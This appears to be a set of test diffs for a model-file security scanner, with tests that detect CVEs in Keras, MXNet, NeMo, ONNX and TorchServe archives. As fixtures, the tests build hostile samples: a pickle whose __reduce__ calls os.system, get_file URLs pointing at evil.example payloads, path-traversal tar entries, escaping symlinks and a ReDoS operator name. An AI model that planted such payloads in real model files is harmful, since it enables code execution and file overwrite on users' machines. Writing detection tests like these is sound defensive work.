+++ b/tests/scanners/test_keras_zip_scanner.py
@@ -2243,6 +2243,88 @@ class TestCVE20258747GetFileGadget:
         assert len(cve_issues) == 1
         assert cve_issues[0].details["urls"] == ["https://evil.example/payload.tgz"]
 
+    def test_get_file_extract_tar_url_fragment_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """URL fragments must not hide tar extraction gadgets from CVE attribution."""
+        scanner = KerasZipScanner()
+        archive_url = "https://evil.example/payload.tar.gz#comment-token"
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": archive_url,
+                            "extract": True,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["urls"] == [archive_url]
+
+    def test_get_file_extract_tar_url_fragment_in_kwargs_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """kwargs.origin fragments should remain part of the detected archive URL."""
+        scanner = KerasZipScanner()
+        archive_url = "https://evil.example/payload.tgz#fragment"
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "keras.utils.get_file",
+                            "kwargs": {
+                                "origin": archive_url,
+                                "extract": True,
+                            },
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["urls"] == [archive_url]
+
+    def test_get_file_positional_extract_tar_url_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Positional get_file args with extract=True should receive CVE attribution."""
+        scanner = KerasZipScanner()
+        archive_url = "https://evil.example/payload.tar.zst"
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "keras.utils.get_file",
+                            "args": ["payload.tar.zst", archive_url, False, None, None, "datasets", "auto", True],
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["urls"] == [archive_url]
+
     def test_get_file_tar_url_without_extract_true_no_cve_2025_12060(self, tmp_path: Path) -> None:
         """Tar URLs are only CVE-2025-12060 when the same get_file call extracts them."""
         scanner = KerasZipScanner()

--- a/tests/scanners/test_keras_zip_scanner.py
+++ b/tests/scanners/test_keras_zip_scanner.py
@@ -2186,6 +2186,136 @@ class TestCVE20258747GetFileGadget:
         assert len(cve_issues) >= 1, "Should detect get_file + URL in nested kwargs as CVE-2025-8747"
         assert cve_issues[0].severity == IssueSeverity.CRITICAL
 
+    def test_get_file_extract_tar_url_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """get_file(extract=True) with a remote tar URL should be attributed to CVE-2025-12060."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": "https://evil.example/payload.tar.gz",
+                            "extract": True,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        details = cve_issues[0].details
+        assert details["cvss"] == 8.8
+        assert details["cwe"] == "CWE-22"
+        assert "remediation" in details
+        assert details["urls"] == ["https://evil.example/payload.tar.gz"]
+
+    def test_get_file_extract_tar_url_in_kwargs_detects_cve_2025_12060(self, tmp_path: Path) -> None:
+        """kwargs.origin plus kwargs.extract=True should be treated as a get_file extraction call."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "keras.utils.get_file",
+                            "kwargs": {
+                                "origin": "https://evil.example/payload.tgz",
+                                "extract": True,
+                            },
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].details["urls"] == ["https://evil.example/payload.tgz"]
+
+    def test_get_file_tar_url_without_extract_true_no_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Tar URLs are only CVE-2025-12060 when the same get_file call extracts them."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": "https://evil.example/payload.tar.gz",
+                            "extract": False,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-8747"]
+
+    def test_get_file_extract_non_archive_url_no_cve_2025_12060(self, tmp_path: Path) -> None:
+        """extract=True on a non-tar URL is not enough for the tar extraction CVE."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "url": "https://evil.example/payload.bin",
+                            "extract": True,
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+        assert [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-8747"]
+
+    def test_get_file_metadata_extract_tar_url_no_cve_2025_12060(self, tmp_path: Path) -> None:
+        """Metadata nested beside get_file should not be mistaken for get_file extraction args."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "Dense",
+                        "name": "dense_1",
+                        "config": {
+                            "fn": "get_file",
+                            "metadata": {
+                                "origin": "https://evil.example/payload.tar.gz",
+                                "extract": True,
+                            },
+                        },
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        assert not [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-12060"]
+
     def test_get_file_with_nested_metadata_url_not_flagged(self, tmp_path: Path) -> None:
         """Nested metadata URLs in the same node should not be treated as get_file arguments."""
         scanner = KerasZipScanner()

--- a/tests/scanners/test_mxnet_scanner.py
+++ b/tests/scanners/test_mxnet_scanner.py
@@ -145,6 +145,72 @@ def test_mxnet_scanner_detects_suspicious_custom_operator_reference(tmp_path: Pa
     assert "node: custom_loader" in (custom_issues[0].location or "")
 
 
+def test_mxnet_scanner_detects_cve_2022_24294_pathological_operator_name(tmp_path: Path) -> None:
+    symbol_path = tmp_path / "redos-symbol.json"
+    params_path = tmp_path / "redos-0000.params"
+    pathological_operator = "<A" * 600
+    _write_symbol_file(
+        symbol_path,
+        custom_node={
+            "op": pathological_operator,
+            "name": "redos_operator",
+            "attrs": {"kernel": "(1,1)"},
+            "inputs": [[1, 0, 0]],
+        },
+    )
+    _write_params_file(params_path)
+
+    result = MXNetScanner().scan(str(symbol_path))
+
+    cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2022-24294"]
+    assert len(cve_checks) == 1
+    assert cve_checks[0].severity == IssueSeverity.WARNING
+    details = cve_checks[0].details
+    assert details["cvss"] == 7.5
+    assert details["cwe"] == "CWE-400"
+    assert "remediation" in details
+    assert details["finding_count"] == 1
+    assert details["findings"][0]["op_name_length"] == len(pathological_operator)
+
+
+def test_mxnet_scanner_long_simple_operator_name_no_cve(tmp_path: Path) -> None:
+    symbol_path = tmp_path / "long-safe-symbol.json"
+    params_path = tmp_path / "long-safe-0000.params"
+    _write_symbol_file(
+        symbol_path,
+        custom_node={
+            "op": f"Custom{'A' * 2000}",
+            "name": "long_custom_operator",
+            "attrs": {"kernel": "(1,1)"},
+            "inputs": [[1, 0, 0]],
+        },
+    )
+    _write_params_file(params_path)
+
+    result = MXNetScanner().scan(str(symbol_path))
+
+    assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2022-24294"]
+
+
+def test_mxnet_scanner_long_node_name_no_cve(tmp_path: Path) -> None:
+    symbol_path = tmp_path / "long-node-symbol.json"
+    params_path = tmp_path / "long-node-0000.params"
+    _write_symbol_file(
+        symbol_path,
+        custom_node={
+            "op": "Convolution",
+            "name": f"node_{'<' * 1500}",
+            "attrs": {"kernel": "(1,1)", "num_filter": "8"},
+            "inputs": [[1, 0, 0]],
+        },
+    )
+    _write_params_file(params_path)
+
+    result = MXNetScanner().scan(str(symbol_path))
+
+    assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2022-24294"]
+
+
 def test_mxnet_scanner_detects_encoded_metadata_payload(tmp_path: Path) -> None:
     symbol_path = tmp_path / "payload-symbol.json"
     params_path = tmp_path / "payload-0000.params"

--- a/tests/scanners/test_nemo_scanner.py
+++ b/tests/scanners/test_nemo_scanner.py
@@ -201,6 +201,112 @@ class TestNemoArchiveVulnerabilityCoverage:
         assert "CVE-2026-24157" in details["related_cves"]
         assert details["nested_scanner"] == "pickle"
 
+    def test_symlink_checkpoint_alias_detects_ne_mo_deserialization_cve(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "checkpoint-symlink-alias.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            link_info = tarfile.TarInfo(name="model_weights.ckpt")
+            link_info.type = tarfile.SYMTYPE
+            link_info.linkname = "payload.pkl"
+            tar.addfile(link_info)
+            _add_tar_bytes(tar, "payload.pkl", _build_malicious_pickle())
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        cve_checks = [
+            check
+            for check in result.checks
+            if check.details.get("cve_id") == "CVE-2025-23249" and check.details.get("entry") == "model_weights.ckpt"
+        ]
+        assert len(cve_checks) == 1
+        assert cve_checks[0].severity == IssueSeverity.CRITICAL
+
+    def test_large_checkpoint_member_fails_closed(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "checkpoint-large.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "model_weights.ckpt", b"not scanned")
+
+        result = NemoScanner({"max_nemo_checkpoint_scan_bytes": 1}).scan(str(nemo_path))
+
+        skipped_checks = [
+            check
+            for check in result.checks
+            if check.details.get("scan_outcome_reason") == "nemo_checkpoint_scan_skipped_size_limit"
+        ]
+        assert result.success is False
+        assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME
+        assert len(skipped_checks) == 1
+        assert skipped_checks[0].status == CheckStatus.FAILED
+        assert skipped_checks[0].details["max_scan_bytes"] == 1
+
+    def test_nested_checkpoint_scanner_failure_fails_closed(
+        self,
+        tmp_path: Path,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        class RaisingScanner:
+            name = "raising_nested"
+
+            def scan(self, _path: str) -> None:
+                raise RuntimeError("nested boom")
+
+        import modelaudit.scanners as scanner_registry
+
+        monkeypatch.setattr(
+            scanner_registry,
+            "get_scanner_for_file",
+            lambda _path, config=None: RaisingScanner(),
+        )
+
+        nemo_path = tmp_path / "checkpoint-nested-fails.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "model_weights.ckpt", b"checkpoint bytes")
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        failed_checks = [
+            check
+            for check in result.checks
+            if check.details.get("scan_outcome_reason") == "nemo_checkpoint_nested_scan_failed"
+        ]
+        assert result.success is False
+        assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME
+        assert len(failed_checks) == 1
+        assert failed_checks[0].details["nested_scanner"] == "raising_nested"
+        assert failed_checks[0].details["exception_type"] == "RuntimeError"
+
+    def test_checkpoint_without_nested_scanner_fails_closed(
+        self,
+        tmp_path: Path,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        import modelaudit.scanners as scanner_registry
+
+        monkeypatch.setattr(
+            scanner_registry,
+            "get_scanner_for_file",
+            lambda _path, config=None: None,
+        )
+
+        nemo_path = tmp_path / "checkpoint-no-scanner.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "model_weights.ckpt", b"checkpoint bytes")
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        unsupported_checks = [
+            check
+            for check in result.checks
+            if check.details.get("scan_outcome_reason") == "nemo_checkpoint_no_nested_scanner"
+        ]
+        assert result.success is False
+        assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME
+        assert len(unsupported_checks) == 1
+        assert unsupported_checks[0].details["entry"] == "model_weights.ckpt"
+
     def test_benign_checkpoint_pickle_no_ne_mo_deserialization_cve(self, tmp_path: Path) -> None:
         nemo_path = tmp_path / "checkpoint-safe.nemo"
         with tarfile.open(nemo_path, "w") as tar:

--- a/tests/scanners/test_nemo_scanner.py
+++ b/tests/scanners/test_nemo_scanner.py
@@ -1,7 +1,9 @@
 """Tests for CVE-2025-23304: NVIDIA NeMo Hydra _target_ injection."""
 
 import io
+import pickle
 import tarfile
+import zipfile
 from pathlib import Path
 from typing import Any
 
@@ -49,6 +51,22 @@ def _create_nemo_file(
 
     config_bytes = yaml.safe_dump(config_dict).encode() if HAS_YAML else b"{}"
     return _create_nemo_file_from_bytes(tmp_path, config_bytes, filename=filename, config_name=config_name)
+
+
+def _add_tar_bytes(tar: tarfile.TarFile, name: str, payload: bytes) -> None:
+    info = tarfile.TarInfo(name=name)
+    info.size = len(payload)
+    tar.addfile(info, io.BytesIO(payload))
+
+
+def _build_malicious_pickle() -> bytes:
+    import os as os_module
+
+    class DangerousPayload:
+        def __reduce__(self) -> tuple[Any, tuple[str]]:
+            return (os_module.system, ("echo nemo-checkpoint-test",))
+
+    return pickle.dumps(DangerousPayload())
 
 
 class TestNemoScannerBasic:
@@ -103,6 +121,109 @@ class TestNemoScannerBasic:
         assert len(checks) == 1
         assert checks[0].status != CheckStatus.PASSED
         assert checks[0].severity == IssueSeverity.WARNING
+
+
+@pytest.mark.skipif(not HAS_YAML, reason="PyYAML not installed")
+class TestNemoArchiveVulnerabilityCoverage:
+    """Tests for NeMo archive traversal and checkpoint deserialization coverage."""
+
+    def test_relative_member_path_traversal_detects_cve_2025_23360(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "traversal.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "../../evil.txt", b"overwrite")
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23360"]
+        assert len(cve_checks) == 1
+        assert cve_checks[0].severity == IssueSeverity.CRITICAL
+        details = cve_checks[0].details
+        assert details["cvss"] == 7.1
+        assert details["cwe"] == "CWE-23"
+        assert "remediation" in details
+
+    def test_absolute_member_path_traversal_detects_cve_2025_23250(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "absolute.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "/tmp/evil.txt", b"overwrite")
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23250"]
+        assert len(cve_checks) == 1
+        assert cve_checks[0].severity == IssueSeverity.CRITICAL
+        assert cve_checks[0].details["cvss"] == 7.6
+        assert cve_checks[0].details["cwe"] == "CWE-22"
+
+    def test_symlink_escape_detects_relative_path_traversal_cve(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "symlink.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            link_info = tarfile.TarInfo(name="weights_link")
+            link_info.type = tarfile.SYMTYPE
+            link_info.linkname = "../../outside_weights.ckpt"
+            tar.addfile(link_info)
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23360"]
+        assert len(cve_checks) == 1
+        assert cve_checks[0].details["entry"] == "weights_link"
+        assert cve_checks[0].details["target"] == "../../outside_weights.ckpt"
+
+    def test_normalized_safe_member_path_not_flagged_as_traversal(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "normalized-safe.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "configs/../model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "weights/../model_weights.ckpt", b"not a pickle")
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23360"]
+        assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23250"]
+
+    def test_malicious_checkpoint_detects_ne_mo_deserialization_cve(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "checkpoint-rce.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "model_weights.ckpt", _build_malicious_pickle())
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23249"]
+        assert len(cve_checks) == 1
+        assert cve_checks[0].severity == IssueSeverity.CRITICAL
+        details = cve_checks[0].details
+        assert details["cvss"] == 7.6
+        assert details["cwe"] == "CWE-502"
+        assert "CVE-2026-24157" in details["related_cves"]
+        assert details["nested_scanner"] == "pickle"
+
+    def test_benign_checkpoint_pickle_no_ne_mo_deserialization_cve(self, tmp_path: Path) -> None:
+        nemo_path = tmp_path / "checkpoint-safe.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "model_weights.ckpt", pickle.dumps({"weights": [1, 2, 3]}))
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23249"]
+
+    def test_nested_checkpoint_archive_traversal_not_labeled_deserialization_cve(self, tmp_path: Path) -> None:
+        nested_checkpoint = io.BytesIO()
+        with zipfile.ZipFile(nested_checkpoint, "w") as zipf:
+            zipf.writestr("../../evil.pkl", b"not a pickle")
+
+        nemo_path = tmp_path / "checkpoint-archive-traversal.nemo"
+        with tarfile.open(nemo_path, "w") as tar:
+            _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n")
+            _add_tar_bytes(tar, "model_weights.pt", nested_checkpoint.getvalue())
+
+        result = NemoScanner().scan(str(nemo_path))
+
+        assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23249"]
 
 
 @pytest.mark.skipif(not HAS_YAML, reason="PyYAML not installed")

--- a/tests/scanners/test_onnx_scanner.py
+++ b/tests/scanners/test_onnx_scanner.py
@@ -486,7 +486,7 @@ class TestCVE202634447SymlinkTraversal:
         ]
         assert traversal_checks == []
 
-    def test_broken_symlink_is_missing_external_data_not_cve(
+    def test_broken_symlink_inside_model_dir_is_missing_external_data_not_cve(
         self,
         tmp_path: Path,
         requires_symlinks: None,
@@ -497,7 +497,7 @@ class TestCVE202634447SymlinkTraversal:
             external_path="weights.bin",
             missing_external=True,
         )
-        (tmp_path / "weights.bin").symlink_to(tmp_path.parent / f"{tmp_path.name}_missing_weights.bin")
+        (tmp_path / "weights.bin").symlink_to(tmp_path / "missing_weights.bin")
 
         result = OnnxScanner().scan(str(model_path))
 
@@ -509,6 +509,30 @@ class TestCVE202634447SymlinkTraversal:
         ]
         assert len(missing_checks) == 1
         assert missing_checks[0].severity == IssueSeverity.WARNING
+
+    def test_broken_symlink_escape_detected_without_target_file(
+        self,
+        tmp_path: Path,
+        requires_symlinks: None,
+    ) -> None:
+        model_path = create_onnx_model(
+            tmp_path,
+            external=True,
+            external_path="weights.bin",
+            missing_external=True,
+        )
+        missing_outside_weights = tmp_path.parent / f"{tmp_path.name}_missing_weights.bin"
+        (tmp_path / "weights.bin").symlink_to(missing_outside_weights)
+
+        result = OnnxScanner().scan(str(model_path))
+
+        assert result.success is False
+        cve_checks = [c for c in result.checks if c.details.get("cve_id") == "CVE-2026-34447"]
+        assert len(cve_checks) == 1
+        details = cve_checks[0].details
+        assert cve_checks[0].severity == IssueSeverity.CRITICAL
+        assert details["resolved_path"] == str(missing_outside_weights.resolve())
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2025-51480"]
 
 
 class TestCVE202427318NestedPathTraversal:

--- a/tests/scanners/test_onnx_scanner.py
+++ b/tests/scanners/test_onnx_scanner.py
@@ -435,6 +435,82 @@ class TestCVE202551480SavePathTraversal:
         assert "remediation" in details
 
 
+class TestCVE202634447SymlinkTraversal:
+    """Tests for CVE-2026-34447: ONNX external_data symlink traversal."""
+
+    def test_symlink_escape_detected(self, tmp_path: Path, requires_symlinks: None) -> None:
+        outside_dir = tmp_path.parent / f"{tmp_path.name}_outside"
+        outside_dir.mkdir(parents=True, exist_ok=True)
+        outside_weights = outside_dir / "weights.bin"
+        outside_weights.write_bytes(struct.pack("f", 1.0))
+        model_path = create_onnx_model(
+            tmp_path,
+            external=True,
+            external_path="weights.bin",
+            missing_external=True,
+        )
+        (tmp_path / "weights.bin").symlink_to(outside_weights)
+
+        result = OnnxScanner().scan(str(model_path))
+
+        assert result.success is False
+        cve_checks = [c for c in result.checks if c.details.get("cve_id") == "CVE-2026-34447"]
+        assert len(cve_checks) == 1
+        details = cve_checks[0].details
+        assert cve_checks[0].severity == IssueSeverity.CRITICAL
+        assert details["cvss"] == 5.5
+        assert details["cwe"] == "CWE-22"
+        assert "remediation" in details
+        assert details["resolved_path"] == str(outside_weights.resolve())
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2025-51480"]
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2024-27318"]
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2022-25882"]
+
+    def test_symlink_inside_model_dir_not_flagged(self, tmp_path: Path, requires_symlinks: None) -> None:
+        safe_weights = tmp_path / "safe_payload.bin"
+        safe_weights.write_bytes(struct.pack("f", 1.0))
+        model_path = create_onnx_model(
+            tmp_path,
+            external=True,
+            external_path="weights.bin",
+            missing_external=True,
+        )
+        (tmp_path / "weights.bin").symlink_to(safe_weights)
+
+        result = OnnxScanner().scan(str(model_path))
+
+        assert result.success is True
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2026-34447"]
+        traversal_checks = [
+            c for c in result.checks if c.status == CheckStatus.FAILED and "traversal" in c.message.lower()
+        ]
+        assert traversal_checks == []
+
+    def test_broken_symlink_is_missing_external_data_not_cve(
+        self,
+        tmp_path: Path,
+        requires_symlinks: None,
+    ) -> None:
+        model_path = create_onnx_model(
+            tmp_path,
+            external=True,
+            external_path="weights.bin",
+            missing_external=True,
+        )
+        (tmp_path / "weights.bin").symlink_to(tmp_path.parent / f"{tmp_path.name}_missing_weights.bin")
+
+        result = OnnxScanner().scan(str(model_path))
+
+        assert result.success is True
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2026-34447"]
+        assert not [c for c in result.checks if c.details.get("cve_id") == "CVE-2025-51480"]
+        missing_checks = [
+            c for c in result.checks if c.name == "External Data Reference Check" and c.status == CheckStatus.FAILED
+        ]
+        assert len(missing_checks) == 1
+        assert missing_checks[0].severity == IssueSeverity.WARNING
+
+
 class TestCVE202427318NestedPathTraversal:
     """Tests for CVE-2024-27318: ONNX nested path traversal bypass."""
 

--- a/tests/scanners/test_torchserve_mar_scanner.py
+++ b/tests/scanners/test_torchserve_mar_scanner.py
@@ -813,6 +813,7 @@ def test_scan_detects_path_traversal_member_names(tmp_path: Path) -> None:
     assert details["cve_id"] == "CVE-2023-48299"
     assert details["cvss"] == 7.5
     assert details["cwe"] == "CWE-22"
+    assert "TorchServe MAR archives with traversal entries" in details["description"]
     assert "remediation" in details
 
 

--- a/tests/scanners/test_torchserve_mar_scanner.py
+++ b/tests/scanners/test_torchserve_mar_scanner.py
@@ -809,6 +809,30 @@ def test_scan_detects_path_traversal_member_names(tmp_path: Path) -> None:
     traversal_failures = _failed_checks(result, "TorchServe MAR Path Traversal Protection")
     assert len(traversal_failures) >= 1
     assert traversal_failures[0].severity == IssueSeverity.CRITICAL
+    details = traversal_failures[0].details
+    assert details["cve_id"] == "CVE-2023-48299"
+    assert details["cvss"] == 7.5
+    assert details["cwe"] == "CWE-22"
+    assert "remediation" in details
+
+
+def test_scan_allows_normalized_safe_member_names(tmp_path: Path) -> None:
+    manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}}
+    mar_path = _create_mar_archive(
+        tmp_path,
+        manifest=manifest,
+        entries={
+            "handler.py": b"def handle(data, context):\n    return data\n",
+            "subdir/../weights.bin": b"weights",
+        },
+        filename="normalized_safe.mar",
+    )
+
+    result = TorchServeMarScanner().scan(str(mar_path))
+
+    traversal_failures = _failed_checks(result, "TorchServe MAR Path Traversal Protection")
+    assert traversal_failures == []
+    assert not [check for check in result.checks if check.details.get("cve_id") == "CVE-2023-48299"]
 
 
 def test_scan_detects_conflicting_duplicate_manifest_handler_entries(tmp_path: Path) -> None:


### PR DESCRIPTION
## Summary
- add ONNX CVE-2026-34447 symlink external-data traversal detection
- add Keras CVE-2025-12060, MXNet CVE-2022-24294, TorchServe CVE-2023-48299, and NeMo archive/checkpoint CVE coverage
- add positive and false-positive regression tests for each detector

## Validation
- uv run --python 3.12 ruff check modelaudit/scanners/onnx_scanner.py modelaudit/scanners/torchserve_mar_scanner.py modelaudit/scanners/mxnet_scanner.py modelaudit/scanners/keras_zip_scanner.py modelaudit/scanners/nemo_scanner.py modelaudit/config/explanations.py tests/scanners/test_onnx_scanner.py tests/scanners/test_torchserve_mar_scanner.py tests/scanners/test_mxnet_scanner.py tests/scanners/test_keras_zip_scanner.py tests/scanners/test_nemo_scanner.py
- uv run --python 3.12 ruff format --check modelaudit/scanners/onnx_scanner.py modelaudit/scanners/torchserve_mar_scanner.py modelaudit/scanners/mxnet_scanner.py modelaudit/scanners/keras_zip_scanner.py modelaudit/scanners/nemo_scanner.py modelaudit/config/explanations.py tests/scanners/test_onnx_scanner.py tests/scanners/test_torchserve_mar_scanner.py tests/scanners/test_mxnet_scanner.py tests/scanners/test_keras_zip_scanner.py tests/scanners/test_nemo_scanner.py
- uv run --python 3.12 mypy modelaudit/scanners/onnx_scanner.py modelaudit/scanners/torchserve_mar_scanner.py modelaudit/scanners/mxnet_scanner.py modelaudit/scanners/keras_zip_scanner.py modelaudit/scanners/nemo_scanner.py modelaudit/config/explanations.py tests/scanners/test_onnx_scanner.py tests/scanners/test_torchserve_mar_scanner.py tests/scanners/test_mxnet_scanner.py tests/scanners/test_keras_zip_scanner.py tests/scanners/test_nemo_scanner.py
- PROMPTFOO_DISABLE_TELEMETRY=1 uv run --python 3.12 --extra onnx pytest focused CVE positive/negative nodes
- PROMPTFOO_DISABLE_TELEMETRY=1 uv run --python 3.12 --extra onnx pytest -n auto -m 'not slow and not integration' --maxfail=1

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
  * Expanded vulnerability detection to cover ONNX symlink traversal, Keras archive extraction, MXNet operator name attacks, NeMo checkpoint exploitation, and TorchServe archive path traversal.

* **Tests**
  * Added comprehensive test coverage for new vulnerability detection scenarios.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->